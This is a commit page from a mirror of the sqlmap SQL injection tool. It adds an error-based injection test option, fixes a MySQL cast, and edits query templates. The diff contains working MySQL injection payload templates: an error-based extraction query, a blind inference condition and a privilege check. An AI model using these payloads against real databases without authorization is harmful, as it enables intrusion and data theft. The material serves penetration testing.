sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-07-15 10:42:27 +03:00
Code Issues Packages Projects Releases Wiki Activity

several MySQL fixes/enhancements pointed out by Anton Mogilin

Browse Source
This commit is contained in:
Miroslav Stampar 2010-10-24 22:05:14 +00:00
parent 52f910f752
commit aa931efd4d
4 changed files with 10 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
doc/THANKS
View File

@ -220,7 +220,7 @@ Enrico Milanese <enricomilanese@gmail.com>
for providing me with some ideas for the PHP backdoor for providing me with some ideas for the PHP backdoor
Anton Mogilin <azarmaster81@yahoo.com> Anton Mogilin <azarmaster81@yahoo.com>
for reporting a minor bug for reporting couple of bugs
Alejo Murillo Moya <alex@65535.com> Alejo Murillo Moya <alex@65535.com>
for suggesting a feature for suggesting a feature

8
lib/parse/cmdline.py
View File

@ -212,6 +212,10 @@ def cmdLineParser():
help="Test for stacked queries (multiple " help="Test for stacked queries (multiple "
"statements) support") "statements) support")
techniques.add_option("--error-test", dest="errorTest",
action="store_true", default=False,
help="Test for error based SQL injection support (beta)")
techniques.add_option("--time-test", dest="timeTest", techniques.add_option("--time-test", dest="timeTest",
action="store_true", default=False, action="store_true", default=False,
help="Test for time based blind SQL injection") help="Test for time based blind SQL injection")
@ -492,10 +496,6 @@ def cmdLineParser():
parser.add_option("--profile", dest="profile", action="store_true", parser.add_option("--profile", dest="profile", action="store_true",
default=False, help=SUPPRESS_HELP) default=False, help=SUPPRESS_HELP)
parser.add_option("--error-test", dest="errorTest",
action="store_true", default=False,
help=SUPPRESS_HELP)
parser.add_option("--cpu-throttle", dest="cpuThrottle", type="int", default=10, parser.add_option("--cpu-throttle", dest="cpuThrottle", type="int", default=10,
help=SUPPRESS_HELP) help=SUPPRESS_HELP)

2
lib/techniques/error/use.py
View File

@ -51,7 +51,7 @@ def errorUse(expression):
nulledCastedField = agent.nullAndCastField(fieldToCastStr) nulledCastedField = agent.nullAndCastField(fieldToCastStr)
if kb.dbms == "MySQL": if kb.dbms == "MySQL":
nulledCastedField = nulledCastedField.replace("CHAR(10000)", "CHAR(255)") #fix for that 'Subquery returns more than 1 row' nulledCastedField = nulledCastedField.replace("AS CHAR)", "AS CHAR(255))") #fix for that 'Subquery returns more than 1 row'
expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1) expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
expressionUnescaped = unescaper.unescape(expressionReplaced) expressionUnescaped = unescaper.unescape(expressionReplaced)

8
xml/queries.xml
View File

@ -3,7 +3,7 @@
<root> <root>
<!-- MySQL --> <!-- MySQL -->
<dbms value="MySQL"> <dbms value="MySQL">
<cast query="CAST(%s AS CHAR(10000))"/> <cast query="CAST(%s AS CHAR)"/>
<length query="LENGTH(%s)"/> <length query="LENGTH(%s)"/>
<isnull query="IFNULL(%s, ' ')"/> <isnull query="IFNULL(%s, ' ')"/>
<delimiter query=","/> <delimiter query=","/>
@ -26,9 +26,9 @@
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/> <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<error query="%s (SELECT %s FROM(SELECT COUNT(*),CONCAT(%s,(%s),%s,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)"/> <error query="%s (SELECT %s FROM(SELECT COUNT(*),CONCAT(%s,(%s),%s,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)"/>
<inference query="AND ORD(MID((%s), %d, 1)) > %d"/> <inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
<banner query="SELECT VERSION()"/> <banner query="VERSION()"/>
<current_user query="SELECT CURRENT_USER()"/> <current_user query="CURRENT_USER()"/>
<current_db query="SELECT DATABASE()"/> <current_db query="DATABASE()"/>
<is_dba query="(SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) LIMIT 0, 1)='Y'"/> <is_dba query="(SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) LIMIT 0, 1)='Y'"/>
<check_udf query="(SELECT name FROM mysql.func WHERE name='%s' LIMIT 0, 1)='%s'"/> <check_udf query="(SELECT name FROM mysql.func WHERE name='%s' LIMIT 0, 1)='%s'"/>
<users> <users>